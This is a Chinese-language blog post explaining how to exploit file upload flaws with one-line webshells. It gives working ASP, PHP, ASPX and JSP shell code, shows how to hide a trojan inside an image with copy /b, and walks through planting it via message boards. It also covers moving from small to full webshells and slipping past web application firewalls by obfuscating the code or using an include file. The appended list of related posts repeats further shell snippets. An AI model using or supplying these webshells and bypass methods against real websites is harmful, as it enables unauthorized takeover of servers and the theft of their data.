上传漏洞之简单的木马用法(含WAF)

最新推荐文章于 2024-08-13 20:47:30 发布
最新推荐文章于 2024-08-13 20:47:30 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: 上传漏洞 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46230316/article/details/105294572
版权
一句话木马

asp:<%eval request("heroes")%>

php:<?php @eval($_POST[12345]);?>

aspx:<%@ Page Language="Jscript"%><%eval(Request.Item["12345"],"unsafe");%>

jsp:<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%> //保存为1.jsp,提交url为 http://localhost/1.jsp?f=1.txt&;t=hello,访问http://localhost/1.txt 出来hello

  • 制作方法:
    1.C32直接写入
    2.cmd下copy /b 1.jpg+1.asp 2.jpg
    3.右键属性版权内插入(隐蔽性不高)
过程(这里以asp为例)

1.找到数据库是asp格式的网站,然后以留言板或发表文章的方式把一句话木马添加到asp数据库或加进网页
2.我们的目的就是把他写入数据库,无论什么方式
3.打开客户端(就是电脑上那个htm文件),填上加入了一句话的asp文件或者asp网页,然后进入服务器

通过一句话木马利用工具继续传小马

利用工具上传木马

通过小马传大马

上传大马

大马就是这种效果

大马

使用加密过waf

1.到网上找加密文件给一句话加一下密
2.过狗一句话原理:通过打乱变量,用函数进行重新组合成一句话木马,从而绕过waf
过狗一句话

使用包含过waf
  • 各种类型的包含代码可以到网上查
    这里上传两个文件,bao.asp和1.jpg(木马)
    bao.asp:<?–#include file=“1.jpg”–>
  • 因为1.jpg是图片格式,所以代码不执行,去执行bao.asp,而bao.asp又将1.jpg(也就是木马)当做asp执行
mon0dy
关注
专栏目录
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单木马和病毒代码,希望对读者有所帮助。
上传图片格式一句话木马
weixin_46017292的博客
04-25 1万+
一、 随便找一张jpg图片 二、 新建一个txt文档 三、 在文本文档中写入一句话木马 本次实验使用的木马为password <?php @eval($_POST['密码']);?> 四、 写入完成后将后缀名.txt改为.php 五、 合并文件 通过CMD进入储存jpg文件和php文件的目录 命令格式: cd C:\muma 使用copy命令合并文件 命令格式: copy 图片.jpg/b + 木马.php/a 合成.jpg 最后输出合并的木马文件muma.jpg 六、 打开靶场登陆DVW
文件上传图片木马执行之[SUCTF 2019]CheckIn1
qq_58970968的博客
04-14 2307
参考博文:BUUCTF__[SUCTF 2019]CheckIn_题解_风过江南乱的博客-CSDN博客 上传一句话木马文件的普通方式都不可以,发现可以上传jpg木马,jpg木马他也进行内容绕过,不能有<?,但是可以构造其他的,然后还要添加GIF89a进行伪装; 图片木马的制作,不多说;这里上传jpg木马之后,怎么执行里面的木马呢; 目前学到的有两种方法: 1.在apache中,可以用.htacess文件来实现,可这道题也被正则了 2.用.user.ini (知识点在参考里面也有);大概就.
aspx命令执行小马
最新发布
2301_77012231的博客
08-13 172
【代码】aspx命令执行小马。
构造图片木马,绕过文件内容检测上传木马
追风筝的孩子
09-04 1万+
      一般文件内容验证使用getimagesizeo函数检测,会判断文件是否是一个有效的文件图片,如果是,则允许上传,否则的话不允许上传。将一句话木马插入到一个【合法】的图片文件当中,然后用菜刀远程连接。     1、选择要上传木马,将后缀名(.php)改成(.php.jpg),发现此文件不允许上传,服务器对上传的内容进行了检测。     2、此时我们随便找个图片,与要上传木马放在同...
web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6452
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
【用一句话木马文件上传漏洞挖掘实战】
m0_68563451的博客
03-03 1235
6.使用AntSword(中国蚁剑)管理工具连接一句话,注意连接密码就是一句话里的值。5.成功将一句话木马作为头像上传,右键点击查看图像,可以拿到图片路径。3.点击上传头像,将一句话木马改为图片形式上传,并开启bp抓包。4.在抓包代码中将".jpg"改为".php",返回抓包结果。#用一句话木马文件上传漏洞挖掘实战。1.点击新用户注册,注册一个用户。2.注册成功后点击我的个人资料。打开火狐浏览器,访问目标地址。
上传漏洞-一句话木马
Coisini的博客
05-30 8528
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
渗透测试 2 --- XSS、CSRF、文件上传、文件包、反序列化漏洞
墨鱼菜鸡
07-11 3170
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
Empire用法及操作
weixin_65695770的博客
04-07 1171
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上
PHP相关漏洞------学习笔记
tell_me_404的博客
03-07 622
一、PHP文件包漏洞 1、什么是PHP漏洞 程序开发人员一般会把重复使用的函数写到一个单个文件中,在需要使用某个函数的时候直接调用此文件,二无需再次编写,这种文件调用的过程一般被称为文件包。开发人员为使代码变得更灵活,将被包的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,导致客户端可以嗲用一个恶意文件,造成文件包漏洞。几乎所有的脚本语言都会提供文件包的功能,单文件包漏洞在PH...
文件上传漏洞通关教程
weixin_64713446的博客
09-23 1990
原理:应用程序中存在上传功能,但是对上传文件没有经过合法性校验或者检验函数存在缺陷,导致攻击者可以上传木马文件到服务器application/octet-stream。
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
热门推荐
Quantum Intelligence
08-04 5万+
首先回顾一下以前ASP一句话的经典木马吧!"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析语言终究发展成为中间代码例如java .net  动态执行也就不存在
src马总结
goddemon
01-20 374
php #phpinfo马 <?php $a="phpinfo()"; eval("$a;");?> 三个类型的一句话木马 php一句话木马: <?php @eval($_POST[value]); ?> asp一句话木马: <%eval request ("value")%> 或 <% execute(request("value")) %> aspx一句话木马: <%@ Page Language="Jscript" %> &l
Get Shell! — 绕过防护上传木马
qq_52108058的博客
11-14 1037
web的义显然是需要服务器开放web服务shell是一个人机交互页面拿shell的义是取得对服务器/电脑某种程度上的操作权限webshell拿到网站服务器的权限(shell)木马可以帮助我们拿到shell,以达到控制网站服务器的目的,也有人称之为网站的后门工具。
(48.1)【WAF绕过-权限控制】webshell、小马、权限脚本、权限工具
05-19 1291
【权限控制】脚本、木马、工具
MSF怎么把木马上传到目标
nlj1860453的博客
01-29 576
想必Kali小白总是做好了木马却不知道怎么上传到目标机器上,今天我就给大家讲一下上传木马的2钟办法。第一种办法是网站上传,在kali依次输入下面代码把木马上传到网站。此时在目标浏览器输入kali的IP可以看到木马就在网站上,点击文件链接下载后就可以打开了。什么?怎么会有人不会查看IP?kali和Windows查看IP的方法:ifconfigipconfig。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值